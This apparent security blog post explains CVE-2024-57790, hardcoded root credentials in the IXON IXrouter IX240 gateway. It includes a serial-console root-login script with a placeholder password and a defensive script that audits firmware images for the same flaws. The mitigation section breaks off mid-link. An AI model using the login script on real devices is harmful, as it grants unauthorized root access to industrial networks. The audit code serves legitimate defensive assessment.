Recently, a critical vulnerability was discovered in the IXON B.V. IXrouter IX240 (Industrial Edge Gateway) v3., which contains hardcoded root credentials stored in non-volatile flash memory. This vulnerability, tracked as CVE-2024-57790, poses a significant security risk: it enables physically proximate attackers to gain unauthorized root access via UART (Universal Asynchronous Receiver/Transmitter) or SSH (Secure Shell) connections. This blog post delves further into the vulnerability, illustrating the risk it poses to affected systems through code snippets, original references, and exploit details.
Background
The IXrouter is an industrial edge gateway designed by IXON B.V. for IoT (Internet of Things) applications; it securely connects devices to the cloud for data transfer, remote monitoring, and control. Organizations across sectors such as manufacturing, healthcare, and energy rely on these devices for secure and reliable communication between their industrial equipment and networks. Any security vulnerability in them therefore poses a serious risk to the confidentiality, integrity, and availability of the data they transmit.
Vulnerability Details
The vulnerability lies in the IXrouter device's firmware, which contains hardcoded root credentials stored in non-volatile flash memory. An attacker with physical access to the device can use these credentials to gain root access via UART or SSH. The following code snippet illustrates how an attacker with a serial console attached could log in over UART with the hardcoded credentials:

```python
import serial  # pyserial


def uart_connect(serial_port="/dev/ttyUSB", baud_rate=115200):
    # Device node of the USB-to-UART adapter (a typical system enumerates it as /dev/ttyUSB0)
    serial_conn = serial.Serial(serial_port, baud_rate, timeout=2)
    serial_conn.write(b'\r\n')  # wake the console login prompt
    # Sending root login credentials (placeholder for the password baked into flash)
    serial_conn.write(b'root\r\n')
    serial_conn.write(b'hardcoded_password_here\r\n')
    # Verify access: `id` prints "uid=0(root)" when the login produced a root shell
    serial_conn.write(b'id\r\n')
    while True:
        response = serial_conn.readline()
        if not response:  # read timed out with no output: no root shell obtained
            print("Login failed")
            break
        if b"uid=0(root)" in response:
            print("Root access granted!")
            break
    serial_conn.close()
```
An attacker can then use this access to modify configurations, exfiltrate sensitive information, or launch further attacks on the target network. This poses a significant risk to the organization's operational security and to the data processed or transmitted through the affected device.
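From the defender's side, the same three conditions can be checked in a firmware image before a device ships or during an assessment: a root account whose password hash is baked into the image, an active login getty on a serial (UART) console, and sshd permitting root login. The following Python script is an added example, not code from the original post or from IXON; it audits an extracted Linux-style root filesystem and assumes standard file locations (/etc/shadow, /etc/inittab, /etc/ssh/sshd_config), while the sample image contents are constructed for the demo and say nothing about IXrouter's real firmware layout.

```python
"""Audit an extracted firmware rootfs for a baked-in root password and the UART/SSH login paths that reach it."""
import re
import tempfile
from pathlib import Path

LOCKED = ("*", "!", "!!", "x")  # shadow values that disable password login for the account

def audit_rootfs(rootfs: str) -> list[str]:
    """Return findings for a rootfs directory (assumed standard Linux paths)."""
    root = Path(rootfs)
    findings = []
    # 1. /etc/shadow: a real hash on the root line means one fixed password ships in every unit.
    shadow = root / "etc/shadow"
    if shadow.is_file():
        for line in shadow.read_text().splitlines():
            fields = line.split(":")
            if fields[0] == "root" and len(fields) > 1:
                if fields[1] == "":
                    findings.append("root has an empty password in /etc/shadow")
                elif fields[1] not in LOCKED:
                    findings.append("root has a fixed password hash in /etc/shadow")
    # 2. /etc/inittab: an active getty on a serial device exposes a login prompt on the UART header.
    inittab = root / "etc/inittab"
    if inittab.is_file():
        for line in inittab.read_text().splitlines():
            if not line.lstrip().startswith("#") and re.search(r"getty.*tty(S|AMA|mxc|USB)\d", line):
                findings.append(f"serial login console enabled: {line.strip()}")
    # 3. sshd_config: PermitRootLogin yes lets the same credential be used over the network.
    sshd = root / "etc/ssh/sshd_config"
    if sshd.is_file():
        for line in sshd.read_text().splitlines():
            m = re.match(r"\s*PermitRootLogin\s+(\S+)", line, re.I)
            if m and m.group(1).lower() == "yes":
                findings.append("sshd allows root login (PermitRootLogin yes)")
    return findings

def build_sample_rootfs() -> str:
    """Write a CONSTRUCTED sample rootfs (not IXrouter's real files) into a temp dir."""
    base = Path(tempfile.mkdtemp())
    (base / "etc/ssh").mkdir(parents=True)
    (base / "etc/shadow").write_text(
        "root:$6$demosalt$FAKEHASHFORDEMOONLY:19000:0:99999:7:::\ndaemon:*:19000:0:99999:7:::\n")
    (base / "etc/inittab").write_text(
        "::sysinit:/etc/init.d/rcS\nttyS0::respawn:/sbin/getty -L ttyS0 115200 vt100\n")
    (base / "etc/ssh/sshd_config").write_text("Port 22\nPermitRootLogin yes\n")
    return str(base)

if __name__ == "__main__":
    for finding in audit_rootfs(build_sample_rootfs()):
        print("[!]", finding)
```

A clean image yields no findings; a locked root entry (`root:*:...` or `root:!:...`) is not reported, since no password can authenticate against it.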
Mitigation and Recommendations
IXON B.V. has released a [security advisory](https://www.ixon.cloud/media/security-advisories/ixon-notice-ixon
Timeline
Published on: 02/14/2025 17:15:18 UTC
Last modified on: 03/17/2025 19:15:24 UTC